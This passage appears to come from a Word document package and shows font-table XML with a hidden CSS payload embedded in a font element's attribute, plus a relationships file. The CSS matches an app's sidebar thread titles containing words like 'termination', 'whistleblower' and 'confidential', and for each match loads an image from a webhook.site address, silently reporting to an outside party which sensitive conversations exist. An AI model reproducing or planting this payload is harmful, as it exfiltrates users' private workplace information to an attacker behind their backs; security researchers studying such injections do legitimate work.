/acquisition)!important}div[data-app-action-sidebar-thread-title*=&quot;resignation&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/resignation)!important}div[data-app-action-sidebar-thread-title*=&quot;restructure&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/restructure)!important}div[data-app-action-sidebar-thread-title*=&quot;termination&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/termination)!important}div[data-app-action-sidebar-thread-title*=&quot;confidential&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/confidential)!important}div[data-app-action-sidebar-thread-title*=&quot;disciplinary&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/disciplinary)!important}div[data-app-action-sidebar-thread-title*=&quot;whistleblower&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/whistleblower)!important}div[data-app-action-sidebar-thread-title*=&quot;zz-no-such-thread&quot;]{background-image:url(https://webhook.site/dab8b40c-757f-48ca-9dd4-cab94fb05acc/thread/zz-no-such-thread)!important}.m{color:red}">
    <w:embedRegular r:id="rIdF1" w:fontKey="{00000000-0000-0000-0000-000000000000}"/>
  </w:font>
</w:fonts>
</file>

<file path=word/_rels/document.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rIdFT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/Relationships>
</file>